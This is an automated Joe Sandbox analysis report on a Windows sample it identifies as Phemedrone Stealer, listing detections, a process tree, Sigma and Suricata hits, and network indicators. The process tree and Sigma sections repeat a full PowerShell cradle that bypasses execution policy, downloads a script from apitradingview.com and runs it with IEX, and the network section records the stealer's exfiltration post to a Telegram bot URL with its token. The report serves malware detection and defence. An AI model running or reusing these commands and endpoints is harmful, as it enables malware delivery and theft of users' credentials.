Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DBp7mBJwqD.exe

Overview

General Information

Sample name:DBp7mBJwqD.exe
renamed because original name is a hash value
Original sample name:86e8265d6b499bae9046d4530e26fe0565f8b58f3b8269064ffe6a908018b354.exe
Analysis ID:1548278
MD5:c5d36c7404a03ec6df8024737d97a0c8
SHA1:9a213e487337376c38e0cfdac240dc6ffb5fdc1e
SHA256:86e8265d6b499bae9046d4530e26fe0565f8b58f3b8269064ffe6a908018b354
Tags:apitradingview-comexeuser-JAMESWT_MHT
Infos:

Detection

Phemedrone Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Yara detected Generic Stealer
Yara detected Phemedrone Stealer
.NET source code references suspicious native API functions
AI detected suspicious sample
Bypasses PowerShell execution policy
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Powershell drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: PowerShell Download and Execution Cradles
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • DBp7mBJwqD.exe (PID: 7808 cmdline: "C:\Users\user\Desktop\DBp7mBJwqD.exe" MD5: C5D36C7404A03EC6DF8024737D97A0C8)
    • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7908 cmdline: cmd.exe /c "cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7956 cmdline: cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • cmd.exe (PID: 7972 cmdline: cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8016 cmdline: powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • WmiPrvSE.exe (PID: 2132 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
            • WDSecureUtilities_548.exe (PID: 3432 cmdline: "C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe" -pkek -aoa -y MD5: BCB323EB0CFD10D58CF134BC7BDC8D67)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.1515907713.000002545E8BB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PhemedroneStealerYara detected Phemedrone StealerJoe Security
    0000000A.00000002.1515907713.000002545E8BB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GenericStealer_9Yara detected Generic StealerJoe Security
      0000000A.00000002.1515907713.000002545E8D6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PhemedroneStealerYara detected Phemedrone StealerJoe Security
        0000000A.00000002.1515907713.000002545EC7A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PhemedroneStealerYara detected Phemedrone StealerJoe Security
          0000000A.00000002.1515907713.000002545EAC7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PhemedroneStealerYara detected Phemedrone StealerJoe Security
            Click to see the 4 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_8016.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0x165:$b3: ::UTF8.GetString(
            • 0xb9c7:$s1: -join
            • 0x5173:$s4: +=
            • 0x5235:$s4: +=
            • 0x945c:$s4: +=
            • 0xb579:$s4: +=
            • 0xb863:$s4: +=
            • 0xb9a9:$s4: +=
            • 0x658ad:$s4: +=
            • 0x6592d:$s4: +=
            • 0x659f3:$s4: +=
            • 0x65a73:$s4: +=
            • 0x65c49:$s4: +=
            • 0x65ccd:$s4: +=
            • 0xc0a0:$e4: Start-Process
            • 0xc1a8:$e4: Get-Process
            • 0x6644b:$e4: Get-WmiObject
            • 0x6663a:$e4: Get-Process
            • 0x66692:$e4: Start-Process

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: PowerShell Download and Execution Cradles
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c "cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"", CommandLine: cmd.exe /c "cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\DBp7mBJwqD.exe", ParentImage: C:\Users\user\Desktop\DBp7mBJwqD.exe, ParentProcessId: 7808, ParentProcessName: DBp7mBJwqD.exe, ProcessCommandLine: cmd.exe /c "cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"", ProcessId: 7908, ProcessName: cmd.exe
            Sigma detected: Change PowerShell Policies to an Insecure Level
            Source: Process startedAuthor: frack113: Data: Command: powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script", CommandLine: powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7972, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script", ProcessId: 8016, ProcessName: powershell.exe
            Sigma detected: Potential Binary Or Script Dropper Via PowerShell
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8016, TargetFilename: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exe
            Sigma detected: PowerShell Web Download
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c "cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"", CommandLine: cmd.exe /c "cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\DBp7mBJwqD.exe", ParentImage: C:\Users\user\Desktop\DBp7mBJwqD.exe, ParentProcessId: 7808, ParentProcessName: DBp7mBJwqD.exe, ProcessCommandLine: cmd.exe /c "cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"", ProcessId: 7908, ProcessName: cmd.exe
            Sigma detected: Usage Of Web Request Commands And Cmdlets
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: cmd.exe /c "cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"", CommandLine: cmd.exe /c "cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\DBp7mBJwqD.exe", ParentImage: C:\Users\user\Desktop\DBp7mBJwqD.exe, ParentProcessId: 7808, ParentProcessName: DBp7mBJwqD.exe, ProcessCommandLine: cmd.exe /c "cmd.exe /c start /min cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"", ProcessId: 7908, ProcessName: cmd.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script", CommandLine: powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7972, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script", ProcessId: 8016, ProcessName: powershell.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-04T09:39:04.720276+010020229301A Network Trojan was detected172.202.163.200443192.168.2.1149774TCP
            2024-11-04T09:39:43.048659+010020229301A Network Trojan was detected172.202.163.200443192.168.2.1149981TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-04T09:38:56.060215+010028032742Potentially Bad Traffic192.168.2.114973386.104.15.60443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://apitradingview.comAvira URL Cloud: Label: malware
            Source: https://apitradingview.com/WDSecureUtilities.exeAvira URL Cloud: Label: malware
            Source: http://apitradingview.comAvira URL Cloud: Label: malware
            Source: https://apitradingview.com/ermando1.txtAvira URL Cloud: Label: malware
            Multi AV Scanner detection for dropped file
            Source: :newads (copy)ReversingLabs: Detection: 78%
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeReversingLabs: Detection: 78%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.4% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeJoe Sandbox ML: detected
            Source: unknownHTTPS traffic detected: 86.104.15.60:443 -> 192.168.2.11:49717 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.70.233:443 -> 192.168.2.11:49754 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:49795 version: TLS 1.2
            Source: DBp7mBJwqD.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

            Networking

            barindex
            Uses the Telegram API (likely for C&C communication)
            Source: unknownDNS query: name: api.telegram.org
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 172.67.70.233 172.67.70.233
            Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49733 -> 86.104.15.60:443
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.11:49774
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.11:49981
            Source: global trafficHTTP traffic detected: GET /WDSecureUtilities.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: apitradingview.com
            Source: global trafficHTTP traffic detected: POST /bot8091768794:AAFZsJ1h-6BiszgyLm-eH6c-uITQ7Z99Wbc/sendDocument HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600Content-Type: multipart/form-data; boundary=----------------------------8dcfc823ae7a7a0Host: api.telegram.orgContent-Length: 723700Expect: 100-continueConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /ermando1.txt HTTP/1.1User-Agent: TradingViewHost: apitradingview.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /WDSecureUtilities.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: apitradingview.com
            Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: apitradingview.com
            Source: global trafficDNS traffic detected: DNS query: get.geojs.io
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot8091768794:AAFZsJ1h-6BiszgyLm-eH6c-uITQ7Z99Wbc/sendDocument HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600Content-Type: multipart/form-data; boundary=----------------------------8dcfc823ae7a7a0Host: api.telegram.orgContent-Length: 723700Expect: 100-continueConnection: Keep-Alive
            Source: WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E8D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: powershell.exe, 00000008.00000002.1582598087.0000019256A19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://apitradingview.com
            Source: WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545EA37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://get.geojs.io
            Source: powershell.exe, 00000008.00000002.1611131122.0000019265BE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000008.00000002.1582598087.0000019255D97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000008.00000002.1582598087.0000019255F29000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E8D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: powershell.exe, 00000008.00000002.1582598087.0000019255B71000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000008.00000002.1582598087.0000019255F29000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E8D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: powershell.exe, 00000008.00000002.1582598087.0000019255D97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000008.00000002.1582598087.0000019255B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E8D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.tele
            Source: WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E8D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E8D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E8D6000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8091768794:AAFZsJ1h-6BiszgyLm-eH6c-uITQ7Z99Wbc/sendDocument
            Source: powershell.exe, 00000008.00000002.1582598087.0000019255D97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1582598087.0000019256A19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apitradingview.com
            Source: powershell.exe, 00000008.00000002.1582598087.0000019255F29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1582598087.0000019255F25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apitradingview.com/WDSecureUtilities.exe
            Source: powershell.exe, 00000008.00000002.1582598087.0000019255D97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apitradingview.com/ermando1.txt
            Source: powershell.exe, 00000008.00000002.1611131122.0000019265BE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000008.00000002.1611131122.0000019265BE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000008.00000002.1611131122.0000019265BE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://get.geojs.io
            Source: WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://get.geojs.io/v1/ip/geo.json
            Source: powershell.exe, 00000008.00000002.1582598087.0000019255D97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000008.00000002.1611131122.0000019265BE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/
            Source: WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545EAC7000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545EAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/TheDyer
            Source: WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545E841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/freakcodingspot
            Source: WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545EAC7000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtilities_548.exe, 0000000A.00000002.1515907713.000002545EAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/webster480
            Source: DBp7mBJwqD.exeString found in binary or memory: https://www.graalvm.org/
            Source: DBp7mBJwqD.exeString found in binary or memory: https://www.graalvm.org/latest/reference-manual/native-image/metadata/#
            Source: DBp7mBJwqD.exeString found in binary or memory: https://www.graalvm.org/latest/reference-manual/native-image/metadata/#resources-and-resource-bundle
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownHTTPS traffic detected: 86.104.15.60:443 -> 192.168.2.11:49717 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.70.233:443 -> 192.168.2.11:49754 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:49795 version: TLS 1.2

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: amsi64_8016.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 8016, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Powershell drops PE file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeJump to dropped file
